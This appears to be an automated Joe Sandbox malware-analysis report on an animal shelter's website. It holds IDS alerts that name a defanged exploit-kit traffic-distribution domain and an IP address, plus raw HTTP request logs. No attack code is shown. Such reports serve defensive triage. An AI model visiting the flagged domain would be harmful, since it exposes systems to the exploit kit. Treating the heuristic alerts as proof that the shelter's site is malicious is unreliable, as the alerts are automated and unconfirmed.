Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://indyhumane.org

Overview

General Information

Sample URL:http://indyhumane.org
Analysis ID:1586410
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
HTML page contains suspicious onload / onerror event
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
HTML page contains hidden javascript code
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64
  • chrome.exe (PID: 5596 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2044 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1612,i,14363034678728640408,9950297544825617298,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6512 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://indyhumane.org" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-09T02:59:13.497507+010020574471Exploit Kit Activity Detected192.168.2.4655271.1.1.153UDP
2025-01-09T02:59:13.497649+010020574471Exploit Kit Activity Detected192.168.2.4599181.1.1.153UDP
2025-01-09T02:59:15.157217+010020574471Exploit Kit Activity Detected192.168.2.4605511.1.1.153UDP
2025-01-09T02:59:15.157392+010020574471Exploit Kit Activity Detected192.168.2.4535061.1.1.153UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-09T02:59:14.890891+010020574481Exploit Kit Activity Detected192.168.2.449844185.121.15.137443TCP
2025-01-09T02:59:16.349722+010020574481Exploit Kit Activity Detected192.168.2.449866185.121.15.137443TCP
2025-01-09T02:59:24.233665+010020574481Exploit Kit Activity Detected192.168.2.449950185.121.15.137443TCP
2025-01-09T02:59:25.486025+010020574481Exploit Kit Activity Detected192.168.2.449974185.121.15.137443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-09T02:59:18.903831+010020221121Exploit Kit Activity Detected192.168.2.44991034.111.113.62443TCP

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: https://indyhumane.org/HTTP Parser: window.location.href='https://pixel-sync.sitescout.com/dmp/asyncpixelsync'
Source: https://indyhumane.org/HTTP Parser: window.location.href='https://pixel-sync.sitescout.com/dmp/asyncpixelsync'
Source: https://indyhumane.org/adopt/adoptable-cats/HTTP Parser: Base64 decoded: o=2&type=1&code=1969&tl=129600
Source: https://indyhumane.org/HTTP Parser: Iframe src: //www.googletagmanager.com/ns.html?id=GTM-55MWRN
Source: https://indyhumane.org/HTTP Parser: Iframe src: //www.googletagmanager.com/ns.html?id=GTM-55MWRN
Source: https://indyhumane.org/HTTP Parser: Iframe src: https://td.doubleclick.net/td/ga/rul?tid=G-VFFY2PDZ27&gacid=932040568.1736387953&gtm=45je5170v9118100243z8898710595za200zb898710595&dma=0&gcd=13l3l3l3l1l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101925629~102067555~102067808~102081485~102198178&z=1445872596
Source: https://indyhumane.org/HTTP Parser: No favicon
Source: https://indyhumane.org/HTTP Parser: No favicon
Source: https://indyhumane.org/adopt/adoptable-cats/HTTP Parser: No favicon
Source: https://indyhumane.org/HTTP Parser: No <meta name="author".. found
Source: https://indyhumane.org/HTTP Parser: No <meta name="copyright".. found

Networking

barindex
Source: Network trafficSuricata IDS: 2057447 - Severity 1 - ET EXPLOIT_KIT Malicious TDS Domain in DNS Lookup (leatherbook .org) : 192.168.2.4:59918 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2057447 - Severity 1 - ET EXPLOIT_KIT Malicious TDS Domain in DNS Lookup (leatherbook .org) : 192.168.2.4:65527 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2057448 - Severity 1 - ET EXPLOIT_KIT Malicious TDS Domain in TLS SNI (leatherbook .org) : 192.168.2.4:49844 -> 185.121.15.137:443
Source: Network trafficSuricata IDS: 2057447 - Severity 1 - ET EXPLOIT_KIT Malicious TDS Domain in DNS Lookup (leatherbook .org) : 192.168.2.4:60551 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2057447 - Severity 1 - ET EXPLOIT_KIT Malicious TDS Domain in DNS Lookup (leatherbook .org) : 192.168.2.4:53506 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2057448 - Severity 1 - ET EXPLOIT_KIT Malicious TDS Domain in TLS SNI (leatherbook .org) : 192.168.2.4:49866 -> 185.121.15.137:443
Source: Network trafficSuricata IDS: 2057448 - Severity 1 - ET EXPLOIT_KIT Malicious TDS Domain in TLS SNI (leatherbook .org) : 192.168.2.4:49950 -> 185.121.15.137:443
Source: Network trafficSuricata IDS: 2057448 - Severity 1 - ET EXPLOIT_KIT Malicious TDS Domain in TLS SNI (leatherbook .org) : 192.168.2.4:49974 -> 185.121.15.137:443
Source: global trafficTCP traffic: 192.168.2.4:59510 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.4:49910 -> 34.111.113.62:443
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: indyhumane.orgConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/css/dist/block-library/style.min.css?ver=6.7.1 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/thrive-theme/style.css?ver=6.7.1 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/indy-humane/style.css?ver=1.0 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/css/dashicons.min.css?ver=6.7.1 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/thrive-theme/inc/assets/dist/landingpage-front.css?ver=10.4.2 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/thrive-theme/style.css?ver=10.4.2 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/c74a3261-0887-4eef-a819-4790e9521a1b.jpg HTTP/1.1Host: g.petango.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/ui/core.min.js?ver=1.13.3 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/ui/menu.min.js?ver=1.13.3 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/dom-ready.min.js?ver=f77871ff7694fffea381 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/ui/menu.min.js?ver=1.13.3 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/dom-ready.min.js?ver=f77871ff7694fffea381 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/a11y.min.js?ver=3156534cc54473497e14 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/ui/autocomplete.min.js?ver=1.13.3 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /photos/352/c74a3261-0887-4eef-a819-4790e9521a1b.jpg HTTP/1.1Host: g.petango.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/js/imagesloaded.min.js?ver=5.0.0 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/js/masonry.min.js?ver=4.2.2 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/ui/core.min.js?ver=1.13.3 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery.masonry.min.js?ver=3.1.2b HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/general.min.js?ver=10.4.2 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/a11y.min.js?ver=3156534cc54473497e14 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/thrive-theme/inc/assets/dist/frontend.min.js?ver=10.4.2 HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2023/05/Logo_Horiz.png HTTP/1.1Host: 149955744.v2.pressablecdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
